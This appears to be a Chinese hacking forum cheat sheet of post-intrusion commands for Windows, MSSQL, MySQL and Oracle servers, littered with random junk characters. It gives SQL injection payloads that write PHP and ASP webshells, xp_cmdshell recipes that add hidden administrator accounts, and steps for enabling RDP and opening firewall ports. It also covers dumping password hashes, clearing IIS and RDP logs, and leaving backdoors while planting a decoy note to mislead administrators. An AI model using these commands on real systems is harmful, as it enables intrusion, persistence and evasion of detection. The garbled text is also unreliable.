; Q- O7 h0 c9 q; N. v
1.net user administrator /passwordreq:no" Q+ b. ~% [) w1 |4 F
这句的意思是"administrator帐号不需要密码",如果可以成功执行的话,3389登陆时administrator的密码就可以留空,直接登陆了,然后进去后再net user administrator /passwordreq:yes恢复就可以了, D$ L' H" L- ?4 o+ E8 |
2.比较巧妙的建克隆号的步骤
4 }: p8 I+ C) p" R( V先建一个user的用户
6 ~3 y3 f7 Y2 N' x& Q8 ]' ]8 |然后导出注册表。然后在计算机管理里删掉
1 @, v5 {* ^' f; u' `5 ?2 e+ g在导入,在添加为管理员组( o7 P/ c. \: J6 T
3.查radmin密码
0 r; G3 }* h1 J, F p0 oreg save HKEY_LOCAL_MACHINE\SYSTEM\RAdmin c:\a.reg
+ u5 q5 o0 U4 A0 {- ?; ]! V4.[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Window NT\CurrentVersion\Image File execution options]3 c' K# j' q) o
建立一个"services.exe"的项
2 U( W% R& Z2 T8 }0 f再在其下面建立(字符串值)
1 n+ u# K; i4 R0 j' A" O8 V键值为mu ma的全路径* ^# k# T) r8 R [$ l
5.runas /user:guest cmd
8 ?5 \* I5 |+ `, ]' ] O7 l测试用户权限!5 m( Q( e4 U& ~' O' F* F. T. x5 p
6.、 tlntadmn config sec = -ntlm exec master.dbo.xp_cmdshell \'tlntadmn config sec = -ntlm\'-- 其实是利用了tlntadmn这个命令。想要详细了解,输入/?看看吧。(这个是需要管理员权限的哦)建立相同用户通过ntml验证就不必我说了吧?
( B% ?0 t, W1 Z9 E9 l2 P' T7.入侵后漏洞修补、痕迹清理,后门置放:
- \& H/ y! P9 j( B基础漏洞必须修补,如SU提权,SA注入等。DBO注入可以考虑干掉xp_treelist,xp_regread自行记得web目录;你一定要记得清理痕迹~sqlserver连接使用企业管理器连接较好,使用查询分析器会留下记录,位于HKEY_CURRENT_USER\Software \Microsoft\Microsoft SQL Server\80\Tools\Client\PrefServers。删除之;IISlog的清除可不要使用AIO类的工具直接完全删除日志~可以选择logcleaner类工具只删除指定IP的访问记录,如果你能gina到管理员密码则通过登陆他清理日志并通过WYWZ进行最后的痕迹清理。话说回来手动清理会比较安全。最后留下一个无日志记录的后门。一句话后门数个,标准后门,cfm后门我一般都不会少。要修改时间的哦~还有一招比较狠滴,如果这个机器只是台普通的肉鸡,放个TXT到管理员桌面吧~提醒他你入侵了,放置了某个后门,添加了某个用户~(当然不是你真正滴重要后门~)要他清理掉。这样你有很大的可能性得以保留你的真实后门5 O* q8 D& G2 i. v
8.declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c
6 b6 _( b/ `, w$ g4 Y
* ?8 R* _) K _8 V. r" z- s8 ofor example4 W. ?) f/ E) Q7 i3 V4 W% l6 n! m; a- I
6 ]4 i6 n* Z: o! N, q+ fdeclare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net user aptime aptime /add'
7 x. A. f- e7 t' ? `' z0 V
& w6 i5 ^% X( ^) \declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net localgroup administrator aptime /add'
( L( i& w4 D3 y' j+ d. u5 `- u$ L
% P2 ?0 p- I I S3 K; V+ x2 _9:MSSQL SERVER 2005默认把xpcmdshell 给ON了
5 G, j9 L( k, E如果要启用的话就必须把他加到高级用户模式4 k- F; |5 R1 B# h' m
可以直接在注入点那里直接注入/ K. A6 ~2 X5 g4 @' B" q- I) g3 Z
id=5;EXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell', 1;RECONFIGURE;--3 u. d4 z2 f& c" _$ I0 M
然后;dbcc addextendedproc("xp_cmdshell","xplog70.dll");--
+ o3 s: I+ `6 U& `$ X" w或者
6 Y/ l* I) d. _2 {sp_addextendedproc xp_cmdshell,@dllname='xplog70.dll'1 E# g& L( R' z# v
来恢复cmdshell。
/ s9 @ `, U9 a, z) b1 u# ^5 x0 _, N7 @% C; \ R" Z
分析器& ~' u* j/ C: h9 j4 d; l7 t7 {
EXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell', 1;RECONFIGURE;--5 \5 M/ ]8 R. S; {
然后;dbcc addextendedproc("xp_cmdshell","xplog70.dll")4 K! O' v8 W) f- W
10.xp_cmdshell新的恢复办法$ d. b- }# I4 M5 }7 l. K
xp_cmdshell新的恢复办法 `: K0 o; t# H& E M
扩展储存过程被删除以后可以有很简单的办法恢复:0 x! v* R/ K( `& g" ^
删除) H* S8 U! M6 P$ }
drop procedure sp_addextendedproc
- w5 [- C3 V5 pdrop procedure sp_oacreate
5 G7 C9 Y# \) _# t1 b: s9 m+ y* R$ gexec sp_dropextendedproc 'xp_cmdshell'
. [" W$ ~* k3 [. g
/ J3 B" b) w- A( l' O恢复
8 O7 s( L7 C5 Y2 @8 s. cdbcc addextendedproc ("sp_oacreate","odsole70.dll")
& S, Z% q( }2 }* n4 ydbcc addextendedproc ("xp_cmdshell","xplog70.dll")
9 J2 `4 w/ ^" R* m3 [- d
3 O) d: Z0 K3 k, g这样可以直接恢复,不用去管sp_addextendedproc是不是存在 B, b* R( T- z
* E& r8 P: ?" D U8 l0 @-----------------------------: }" l: x3 o3 m
3 C$ |. ]! C; k3 W& q6 W删除扩展存储过过程xp_cmdshell的语句:
+ c/ k! L* o! r+ texec sp_dropextendedproc 'xp_cmdshell'
5 ?4 v9 w* G0 t% K; X! h c' B) v
$ C5 l4 _ u8 O恢复cmdshell的sql语句
5 Y+ g5 h& V) v$ @/ W- Eexec sp_addextendedproc xp_cmdshell ,@dllname ='xplog70.dll'! Y) P, w8 X5 _
$ k, C. z; [# j6 v9 N3 L! U
- J k; B: ~ ?7 F0 @) n! F8 c$ ~开启cmdshell的sql语句! z& t7 C% U- a* b4 j+ T, @
1 f5 u4 l8 p9 y% ]3 Z" W
exec sp_addextendedproc xp_cmdshell ,@dllname ='xplog70.dll'. [' l# [4 q0 q8 A8 K+ g
$ D8 I5 w* ]4 y& _4 c判断存储扩展是否存在5 c; X% x2 H+ m& b4 T4 d
select count(*) from master.dbo.sysobjects where xtype='x' and name='xp_cmdshell'
+ P+ a8 p# l/ k* F: N N返回结果为1就ok
& A( V! E: ?% Y% h N0 L+ ]6 l! O1 w0 W5 L" y
恢复xp_cmdshell+ n# ^7 G$ z1 F# m+ n
exec master.dbo.addextendedproc 'xp_cmdshell','xplog70.dll';select count(*) from master.dbo.sysobjects where xtype='x' and name='xp_cmdshell'- x: d) K6 w' {) W7 O0 Z
返回结果为1就ok# |3 Y. m- \! h# Q2 `
9 |3 t5 ] G! O3 w1 V1 G( f否则上传xplog7.0.dll
! v+ z2 f# L/ c/ v# G8 Y3 K/ s8 O. \exec master.dbo.addextendedproc 'xp_cmdshell','c:\winnt\system32\xplog70.dll'5 N, H: s$ w0 P
2 ^4 O' U/ {. Y9 z5 W" Z堵上cmdshell的sql语句
) I6 d% k" L" J6 U4 x: `sp_dropextendedproc "xp_cmdshel
2 b& T% x' j! J3 ~4 K-------------------------; g, m% i9 e$ o; M
清除3389的登录记录用一条系统自带的命令:
+ J4 ^ n8 G' D" Vreg delete "hkcu\Software\Microsoft\Terminal Server Client" /f
% g4 Q4 {9 j2 }& `) Z
m n$ K6 f7 V% m& C然后删除当前帐户的 My Documents 文件夹下的 Default.rdp 文件& O8 ^$ j; e; {: ]- r k5 e6 ]
在 mysql里查看当前用户的权限/ \7 i/ Q$ l7 }" a4 T
show grants for Z- B# M2 O& c% K% o& z
# v5 U) i% @. K6 b7 S& D ]0 `
以下语句具有和ROOT用户一样的权限。大家在拿站时应该碰到过。root用户的mysql,只可以本地连,对外拒绝连接。以下方法可以帮助你解决这个问题了,下面的语句功能是,建立一个用户为itpro 密码123 权限为和root一样。允许任意主机连接。这样你可以方便进行在本地远程操作数据库了。
; n8 l) C& I7 C- d2 [! u7 i- D8 M
! i0 }6 j% h/ [4 Y9 V' i
- k+ K5 }7 p0 F& ?$ lCreate USER 'itpro'@'%' IDENTIFIED BY '123';( P. I1 |- B' p/ o% i" O
, _- E" L; k* G( ^: D7 C" \0 l* p
GRANT ALL PRIVILEGES ON *.* TO 'itpro'@'%' IDENTIFIED BY '123'WITH GRANT OPTION; Q4 x6 u: `* T, k; J
( l" a8 H4 l. I3 ^MAX_QUERIES_PER_HOUR 0 MAX_CONNECTIONS_PER_HOUR 0
: c' a0 h2 O: V5 h0 q% x5 Z9 r% D _8 e# E/ Y/ j
MAX_UpdateS_PER_HOUR 0 MAX_USER_CONNECTIONS 0;# f( X5 K. G: G5 H k9 F$ ^
% K1 A! }9 q4 X搞完事记得删除脚印哟。2 ]2 c1 t7 Z0 Q% L. ~% {1 u
( G9 f+ j4 u5 p5 W# R; gDrop USER 'itpro'@'%';
5 A* Y3 j: |) S k5 t; D5 T5 r. K3 D* j" m1 }
Drop DATABASE IF EXISTS `itpro` ;: t/ k1 j2 R! Q
. m1 m0 S: `0 ^" N6 g; x* v7 E当前用户获取system权限* H$ N& Q: s& H9 r
sc Create SuperCMD binPath= "cmd /K start" type= own type= interact
- k3 z$ t) a; F2 d' V- E8 msc start SuperCMD
^' _. ~ Z+ B" C7 @. T* D程序代码
4 d' F' N' z5 l<SCRIPT LANGUAGE="VBScript">" X# c. J2 t4 k/ D& f$ {* B5 `' Q; O& d
set wsnetwork=CreateObject("WSCRIPT.NETWORK")
$ z' p1 X+ `% O p6 Kos="WinNT://"&wsnetwork.ComputerName" E% i6 z) P, W, Q/ _3 s+ e8 _0 y; R
Set ob=GetObject(os)
j* g5 p5 l% q; K5 X8 u$ LSet oe=GetObject(os&"/Administrators,group")
9 H4 q% g7 y% t- R0 C! M% ]Set od=ob.Create("user","nosec")2 v7 b3 x* z2 ^( s. ~* u/ f
od.SetPassword "123456abc!@#", k6 S" c- z9 }; x; Q! C
od.SetInfo) i F$ H" K8 k- W& f/ E) y
Set of=GetObject(os&"/nosec",user)
- v: f# B* d/ ]2 n% o9 U+ j9 Goe.add os&"/nosec"
9 k$ v! \' b* ` b$ y7 a" o</Script>/ ?0 W& x1 j+ o- ^, c7 k' [9 s V
<script language=javascript>window.close();</script> g* f0 z) a' k7 ?+ X. J2 ~
6 E# l4 C1 C2 T2 h( ~ E& `7 t4 r; E$ U8 x
2 R/ h- ]) o, j" D3 j
( \8 H6 d* N. F7 E4 L' W' i. J突破验证码限制入后台拿shell
9 O, _+ U1 X9 Q; X% i; e' Q程序代码' U9 r% M3 K* u' s2 o1 X
REGEDIT4
* W: D2 ^* _, Y0 z Q8 ^; f[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Security]
/ E+ j. W$ } q4 M"BlockXBM"=dword:00000000
& M& r1 i0 M$ f) ^- ]' |! t* w( S
y2 v: N M& W' j* J% u保存为code.reg,导入注册表,重器IE$ V2 S$ ~* ?$ E6 E
就可以了* H; ]3 K* }% G7 D2 a% N1 G
union写马 n! z( {: l- u
程序代码6 c# n$ L/ Y# w& M5 L4 m
www.baidu.com/plus/infosearch.php?action=search&q=%cf'%20union%20select%201,2,3,4,'<?php%20eval($_POST[cmd])?>',6+into+outfile+'D:\\wwwroot\\duizhang.php'+/*4 n. ?% U4 K3 D4 X- w
$ B c. I! k& J: n% Y; n& s
应用在dedecms注射漏洞上,无后台写马9 I0 r r6 _/ c0 b: F
dedecms后台,无文件管理器,没有outfile权限的时候
5 j+ |! X& u5 P% \! o: V在插件管理-病毒扫描里
, y3 S/ n# ^5 z写一句话进include/config_hand.php里
- o+ o( T& y; c6 |( n" N程序代码# f. J0 s7 H3 W& B
>';?><?php @eval($_POST[cmd]);?>
9 C8 h( d8 Q$ s& x+ ~: m" W6 r& W) c, w8 |
5 i `. v& I- B5 q9 i5 n
如上格式3 f, E$ g1 j# `; q3 m: _
! g0 l" P& r# h6 o* F/ goracle中用低权限用户登陆后可执行如下语句查询sys等用户hash然后用cain破解
$ t! {1 C9 l, F; ]3 z程序代码
6 @% y( i. U+ O |' q; ?; Kselect username,password from dba_users;3 ~! D) j8 [5 T6 E
+ G7 j7 f7 E; {% P1 F- g. `: q
4 q7 q6 Y- G& \6 mmysql远程连接用户% j- o% S2 D1 D. j a. N$ K
程序代码
& j( d' s* T8 X4 F3 C# z4 f* M. y- a. N5 G9 T* v# k& z% t4 |
Create USER 'nosec'@'%' IDENTIFIED BY 'fuckme';5 w& ^8 s) ~. T+ }! h
GRANT ALL PRIVILEGES ON *.* TO 'nosec'@'%' IDENTIFIED BY 'fuckme' WITH GRANT OPTION
3 { E$ b& B- EMAX_QUERIES_PER_HOUR 0 MAX_CONNECTIONS_PER_HOUR 03 r5 E: [' m; y! J8 b D0 ^
MAX_UpdateS_PER_HOUR 0 MAX_USER_CONNECTIONS 0;6 x( u/ S! F g0 G$ M( V. ]
& m" o$ w; l; U
' R* x4 w, z4 ~7 m$ O5 f
$ v2 I, p( z, D6 Y
6 G6 ?) H J, N/ K$ d, f
echo y |reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0
% n8 S" [, g3 j: s( C( T+ [7 |3 I
1.查询终端端口
# y M/ I9 j ~7 o4 @4 s* W% {/ M& r/ a2 m3 P
xp&2003:REG query HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server\WinStations\RDP-Tcp /v PortNumber
( ]/ Z5 W( V' ]# G3 k$ n- O; h& |6 [! x
通用:regedit /e tsp.reg "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal server\Wds\rdpwd\Tds\tcp"
% I+ [3 I r/ x: b% V( Qtype tsp.reg7 k1 x5 O/ L1 ^4 u! {) s
( h \4 _/ N. P7 Z$ V2.开启XP&2003终端服务: ?9 p+ G+ M, r& u+ I2 C9 R
+ w4 o5 X$ L) }7 }
$ m* T8 F; ?# n/ E7 kREG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 0 /f
! w' a8 b- H) \5 l
- i2 p; E$ h9 [, U" J X8 h" W6 c# m
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f
8 g! h. j( I3 ~8 ^! a2 E: @8 ?0 @& O# h
; G6 e) w% I8 a) A) P7 z3.更改终端端口为20008(0x4E28)
) ^0 X1 m" `! G; R9 C q: R" t! T: G8 v6 O/ @
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server\Wds\rdpwd\Tds\tcp /v PortNumber /t REG_DWORD /d 0x4E28 /f! i) K& `" N- Q3 t0 d
0 { }$ ?' V) T" vREG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server\WinStations\RDP-Tcp /v PortNumber /t REG_DWORD /d 0x4E28 /f+ p, f2 e! p& j/ f& L7 N
4 Z8 u$ q2 d0 B6 G3 c- W
4.取消xp&2003系统防火墙对终端服务3389端口的限制及IP连接的限制
0 w+ Y# p3 ~( a4 x
. j7 U R: m5 }! f: GREG ADD HKLM\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\GloballyOpenPorts\List /v 3389:TCP /t REG_SZ /d 3389:TCP:*:Enabledxpsp2res.dll,-22009 /f
' h O0 h6 Q. Y& _& a1 K' o# [8 m2 g8 D; y$ W O+ y
8 h/ e; _) {3 u/ [2 ~8 m. y: @5 L
5.开启Win2000的终端,端口为3389(需重启)* z$ w0 F6 P; U: d2 ]5 a) _8 o
, ?# T0 n4 F9 Aecho Windows Registry Editor Version 5.00 >2000.reg - P+ R- u- _; o
echo. >>2000.reg; i6 D2 E6 C# H% Q- G
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\netcache] >>2000.reg
1 ~" A9 i) T7 h1 X/ eecho "Enabled"="0" >>2000.reg . d2 ~4 \6 N8 C5 [; h; E& `) B
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon] >>2000.reg
: F8 h& h, B4 {echo "ShutdownWithoutLogon"="0" >>2000.reg 9 U+ q4 n$ C! z9 i2 y
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Installer] >>2000.reg
4 v6 r3 k# s) @echo "EnableAdminTSRemote"=dword:00000001 >>2000.reg
) [* y2 |6 v/ `1 P1 ?+ necho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server] >>2000.reg
8 @) C7 |# g5 U. S" C* decho "TSEnabled"=dword:00000001 >>2000.reg
* ]1 j3 x5 N0 x4 Z# H' Recho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermDD] >>2000.reg
% s& y4 Y* E( s! G) O; w) Techo "Start"=dword:00000002 >>2000.reg
% P$ ^3 V0 T' T( ^( Y4 r9 Zecho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermService] >>2000.reg B/ o z3 @6 Y6 ~
echo "Start"=dword:00000002 >>2000.reg / z5 R# X8 s3 {" Q" @
echo [HKEY_USERS\.DEFAULT\Keyboard Layout\Toggle] >>2000.reg
2 N! I+ {6 {2 j5 r* ^echo "Hotkey"="1" >>2000.reg & \4 E+ w, X* E5 _6 p
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp] >>2000.reg
5 C' L# Q* R# U3 Y5 mecho "ortNumber"=dword:00000D3D >>2000.reg
+ a& {3 H4 u' B7 Iecho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp] >>2000.reg
& B; D" ^0 Z" U [echo "ortNumber"=dword:00000D3D >>2000.reg
' d/ P5 u6 H, F7 S6 U
2 c& b6 d1 T0 _6.强行重启Win2000&Win2003系统(执行完最后一条一句后自动重启)! R% `. m9 A! A! y9 I) o( x
3 b, v& F1 u W% m3 V
@ECHO OFF & cd/d %temp% & echo [version] > restart.inf
( G9 x' O( ]1 x0 ]4 A# F6 O( O(set inf=InstallHinfSection DefaultInstall)* Y! K9 B6 ?0 ]2 @. L4 b$ F& o
echo signature=$chicago$ >> restart.inf6 g$ ?/ Y" l2 v/ \
echo [defaultinstall] >> restart.inf9 D: `9 O1 V2 e& J9 e! t- H
rundll32 setupapi,%inf% 1 %temp%\restart.inf
% e! p! `9 d9 w- q! v" r) A& M" v8 v# z! o, f6 Y5 ]. S
D7 E8 d! t X5 @7 g G: m+ L
7.禁用TCP/IP端口筛选 (需重启)
- m- ~ C7 c! c' x7 O+ \) p L1 R& ?4 D8 I3 v/ R8 v+ z& Q
REG ADD HKLM\SYSTEM\ControlSet001\Services\Tcpip\parameters /v EnableSecurityFilters /t REG_DWORD /d 0 /f
# [! `4 \2 z0 ^9 T3 [: _; t( v; A# N+ p& [
8.终端超出最大连接数时可用下面的命令来连接
, z# Z" e, T9 y" L) q$ F5 P/ M& O/ Y) }$ U. j5 h2 b# l
mstsc /v:ip:3389 /console
W/ V5 ^, ]1 q' E8 s9 i5 J, Z
2 ^, J9 `* Q D5 [# r/ I, n$ T9.调整NTFS分区权限
% M* N, C7 Z3 G/ g* z' D8 o9 J' e( ~ ]1 p* [3 t
cacls c: /e /t /g everyone:F (所有人对c盘都有一切权利)( U0 o9 S% ]- o8 i8 d' o
9 w, r. @ F# B# Dcacls %systemroot%\system32\*.exe /d everyone (拒绝所有人访问system32中exe文件)
1 _9 Q# n9 p, O, T$ y3 K- v' d& y
9 l' N7 U( |7 `+ D! e------------------------------------------------------/ E$ ^) {- i4 M L/ Y7 V9 H
3389.vbs
& W! \, m8 T% _0 E' zOn Error Resume Next
5 o8 F! K! T7 V, V4 x, b7 Fconst HKEY_LOCAL_MACHINE = &H80000002$ v. Q1 z7 x- w2 N
strComputer = "."
( d# t. h1 B' q, | DSet StdOut = WScript.StdOut$ y2 T$ u% v9 R& ?# b
Set oreg=GetObject("winmgmts:{impersonationLevel=impersonate}!\\" &_* s9 g2 K- S/ r S/ M, R- q
strComputer & "\root\default:StdRegProv")
, l7 g2 Q# `( q+ C7 I# o4 z2 kstrKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server"! i* E# N% Y; V6 x
oreg.CreateKey HKEY_LOCAL_MACHINE,strKeyPath
' A( t) o$ V; _' UstrKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp"
# [& O( W# v' u7 J! _oreg.CreateKey HKEY_LOCAL_MACHINE,strKeyPath
: R# F. |- G5 x( VstrKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp"
6 Q$ u) h% U Z! j- R9 \( {strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server"- d; P; b4 J1 e' c% n/ B0 z: @
strValueName = "fDenyTSConnections"
7 d# V) U6 r }0 H! SdwValue = 0$ m( G9 c: j4 n. C1 L$ G% g2 M; Q. w
oreg.SetDWORDValue HKEY_LOCAL_MACHINE,strKeyPath,strValueName,dwValue* F/ A9 h, H0 _; O
strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp"% k! Q5 m X- z! ^. { `
strValueName = "ortNumber"' a6 U$ S* z+ Q4 O& W
dwValue = 3389
. V& e4 a: a" v6 U" k uoreg.SetDWORDValue HKEY_LOCAL_MACHINE,strKeyPath,strValueName,dwValue9 x! U0 _; T0 N* ^/ F* Q& o- h
strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp"
) I/ q( `+ q! L0 O/ mstrValueName = "ortNumber"
( ]; m- K( f& wdwValue = 3389
; @- Z; n$ h# N$ S: z3 `. moreg.SetDWORDValue HKEY_LOCAL_MACHINE,strKeyPath,strValueName,dwValue+ C3 j3 b* s4 i/ c+ k) P2 K
Set R = CreateObject("WScript.Shell")
# F+ y% u3 U4 u+ y5 x3 n G: {2 GR.run("Shutdown.exe -f -r -t 0")
) a# ^( D: Q9 [( X' v- O% e( A. V7 Q9 g
删除awgina.dll的注册表键值) Q; F1 g- B i# N1 X' a# m7 Y
程序代码
* i" f9 y: y6 \4 ^' F# w. ^
7 k7 {7 y; e Kreg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v GinaDLL /f
/ ^" \0 H! k, x* g& J
3 a+ `" u7 p8 |
' U! A/ L4 y: m" {# @
8 C, o, ^8 C5 v0 \6 T J6 I7 E! Q
程序代码* @2 x* I! G2 e" w$ b, B! N
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa\NoLMHash+ q5 l% F, T" r/ B$ X- v# n& T& F" }
1 N5 d& U( b, m# X5 d6 [
设置为1,关闭LM Hash% i; ~ m) {! g$ u+ Y) v- ~, ~
! C1 ]3 t1 b. d1 H! A! I; s" V+ D
数据库安全:入侵Oracle数据库常用操作命令
; t( Z# n4 Q9 E0 l最近遇到一个使用了Oracle数据库的服务器,在狂学Oracle+请教高手后终于搞到了网站后台管理界面的所有用户密码。我发现Oracle操作起来真是太麻烦,为了兄弟们以后少走些弯路,我把入侵当中必需的命令整理出来。' E: c9 l; z6 b9 q
1、su – oracle 不是必需,适合于没有DBA密码时使用,可以不用密码来进入sqlplus界面。
8 a8 h8 z2 ~. w) e2、sqlplus /nolog 或sqlplus system/manager 或./sqlplus system/manager@ora9i;
8 z! y) n6 F/ B3、SQL>connect / as sysdba ;(as sysoper)或
! M2 j: d' q- {: g/ S% T" t8 Mconnect internal/oracle AS SYSDBA ;(scott/tiger)
8 d1 s) l: t3 z4 k0 X7 v# w* Z% Oconn sys/change_on_install as sysdba;
" q$ F# t. Q8 o6 V# P$ x4、SQL>startup; 启动数据库实例
+ k. E# R% ?' U/ s! ?/ X! l. W5、查看当前的所有数据库: select * from v$database;: g) _5 a+ s0 `
select name from v$database;
( a) I# a# C, {6、desc v$databases; 查看数据库结构字段
) h: A( E$ I! l; L7、怎样查看哪些用户拥有SYSDBA、SYSOPER权限:
; V, ^& Z" f( f3 FSQL>select * from V_$PWFILE_USERS;7 _7 R6 K: S M ?
Show user;查看当前数据库连接用户
% R1 v8 ]0 m' Y N! l# K8、进入test数据库:database test;
% n1 w* N. x5 `. D6 b9、查看所有的数据库实例:select * from v$instance;
4 B; ^0 p6 z! i2 U& R如:ora9i* _) ?! e& v& l+ e# U0 i, h+ ^
10、查看当前库的所有数据表:+ v B* ?1 e7 |- ~8 ]
SQL> select TABLE_NAME from all_tables;. U1 W/ X3 ?% v9 b( q
select * from all_tables;9 j/ o; t, D3 M( q3 U6 g! `
SQL> select table_name from all_tables where table_name like '%u%';
1 V- \& Y: G" u% dTABLE_NAME
9 j9 z5 ?. H: H% z' t------------------------------/ R0 P' y9 n$ [1 O8 o
_default_auditing_options_
% d w! h# e2 | _/ s+ s' B11、查看表结构:desc all_tables;
) _6 Z3 D& D$ _2 p6 t12、显示CQI.T_BBS_XUSER的所有字段结构:# C2 P! k/ q8 a w: S' C
desc CQI.T_BBS_XUSER;
1 K0 Y" u; x, s$ T3 a2 v! k2 e13、获得CQI.T_BBS_XUSER表中的记录:- m% h6 ?3 h( r+ j1 \" D+ g& m0 r
select * from CQI.T_BBS_XUSER;
0 U8 }8 ^# W2 W$ V14、增加数据库用户:(test11/test)
+ T6 L- I7 `/ E6 } `7 Ccreate user test11 identified by test default tablespace users Temporary TABLESPACE Temp;
" N- e: ~4 Y; }2 V1 N15、用户授权:3 O: _4 S8 R0 p9 _: L/ x x
grant connect,resource,dba to test11;
6 Y) G; _/ \9 V5 ? @# \$ _grant sysdba to test11;. M% b& z& Y- {9 `$ u! w, F e! p
commit;2 R# L* w! B$ t: O# K
16、更改数据库用户的密码:(将sys与system的密码改为test.)
3 K) l! U& L5 f; n2 t: i3 @' J2 jalter user sys indentified by test;
$ e1 I- k; p# ?: Oalter user system indentified by test;) N+ q: h! I5 N. J* V0 F
! y) D5 s1 d, vapplicationContext-util.xml
5 D$ M; W' h* G" M9 BapplicationContext.xml
7 |8 D2 A" L! istruts-config.xml
3 e# P( `* V8 Eweb.xml
& O( Y' |0 B* f5 aserver.xml/ i Z+ ?$ P( v& f( w9 r% {
tomcat-users.xml
) A0 I1 x% R" S. E4 hhibernate.cfg.xml
0 g2 m' \& w. ?3 c8 k) v- ddatabase_pool_config.xml5 o+ a2 _5 i8 S
. t8 L0 ~+ j: R: w8 o8 c" M, {) ^+ U' |8 |
\WEB-INF\classes\hibernate.cfg.xml 数据库连接配置
$ _2 r7 l. ~% `* g2 V/ T\WEB-INF\server.xml 类似http.conf+mysql.ini+php.ini
& |: H+ m& n0 m$ ]7 z% `' \\WEB-INF\struts-config.xml 文件目录结构6 Q% H! c& ^: S
" M* B3 O! {# p4 b- f
spring.properties 里边包含hibernate.cfg.xml的名称3 i8 q3 T1 T$ Q% Y" ?* [; j
1 l; Y5 g a" r0 O2 A8 O
0 s: Y/ F" I, q- lC:\Program Files\Apache Software Foundation\Tomcat 5.5\conf\tomcat-users.xml" j C# y6 w, I6 d0 ~- I
' V, F ?, z. T1 R) h- M* j1 \- p; J
如果都找不到 那就看看class文件吧。。5 n8 }6 b( L# k; |
" t% Y. X1 I3 F& }6 t测试1:# L% Z% C, `5 U8 _) u5 D
SELECT top 1 name=STUFF((SELECT ','+[name] FROM sysobjects t where xtype='U' FOR XML PATH('')), 1, 1, '') FROM sysobjects t1
6 A% `9 [, k6 ~$ W! a0 D- J' t9 a/ |' |. h/ g) D- x! D
测试2:
: v: N5 t- V7 J- F# G4 l
- ?: c# ~! Y6 I& L: r4 `+ E$ gcreate table dirs(paths varchar(100),paths1 varchar(100), id int)5 g# I/ P4 {) S* B) u$ V+ h
* }/ H9 P0 t$ O+ W) z' Hdelete dirs;insert dirs exec master.dbo.xp_dirtree 'c:\',1,1--
) |0 r6 s5 ^* A, f) L0 D
6 G3 Z: W/ u4 y# S; Y; m& e" eSELECT top 1 paths=STUFF((SELECT ','+[paths] FROM dirs FOR XML PATH('')), 1, 1, '') FROM dirs t1* n$ H+ I" b' U* F# ?/ s
5 ~; X, {+ m9 u% u5 I! ]
查看虚拟机中的共享文件:0 `' g. z; \) M" u: @2 Q
在虚拟机中的cmd中执行
; ^5 p2 Q6 U/ g v. g2 I7 e\\.host\Shared Folders3 Z( O; l" n, M: d I+ C1 m0 d
. Q+ T8 e, T& p( Q( dcmdshell下找终端的技巧4 U, {+ k' E( \# @- ]
找终端: 5 u& d$ A* ?( s+ ]
第一步: Tasklist/SVC 列出所有进程,系统服务及其对应的PID值!
. ^& s; N0 b* T. s! M 而终端所对应的服务名为:TermService " \: g5 r% \8 J7 b( A" u) e; r; ]7 `! o
第二步:用netstat -ano命令,列出所有端口对应的PID值!
8 O" Z! [8 X. [. D5 b4 ~ 找到PID值所对应的端口
; C/ W: @7 O# C# z: Q
' I+ K0 X7 V5 W, h8 T" p: M查询sql server 2005中的密码hash
& I' w" P% D. N; A1 f9 jSELECT password_hash FROM sys.sql_logins where name='sa'
3 r% D! @$ S3 qSELECT '<%execute request("a")%>' into [a] in 'c:\x.asp;a.xls' 'excel 8.0;' from a; r# S( R- _1 u, w' j& }3 m* H
access中导出shell, A/ Q2 o# B; l
6 M3 y3 g( Z* R# e1 b% X4 p
中文版本操作系统中针对mysql添加用户完整代码:3 C4 k. H* x" ~0 ^: {! r
1 J3 y- L# z" [5 c
use test;
8 p3 V+ |/ F2 B' m( W; O dcreate table a (cmd text);& c3 o, o' P. ~
